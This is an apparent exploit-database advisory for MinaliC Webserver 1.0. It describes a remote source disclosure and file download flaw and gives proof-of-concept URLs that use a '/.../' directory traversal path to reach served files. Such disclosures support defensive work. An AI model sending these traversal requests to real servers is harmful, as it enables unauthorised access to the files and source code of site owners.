MinaliC Webserver 1.0 Remote Source Disclosure/File Download

2010-10-27 19:15:15

###################################################################
#
# MinaliC Webserver 1.0 Remote Source Disclosure/File Download
# Found By: Dr_IDE
# Date: October 27, 2010
# Download: http://sourceforge.net/projects/minalic/
# Tested on: Windows 7
# Greets: edb team & John Leitch for finding the app
#
###################################################################

- Description -

MinialiC Webserver v1.0 is a Windows based HTTP server. This is the latest
version of the application available.

MinialiC Webserver v1.0 is vulnerable to common remote source disclosure attacks.

- Technical Details - (This is with Directory browsing = Off)

http://[ webserver IP][:port][/.../]index.html (Source Disclosure)
http://[ webserver IP][:port][/.../]logo.bmp (File Download)

http://localhost:8080/.../index.html

#[pocoftheday.blogspot.com]

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.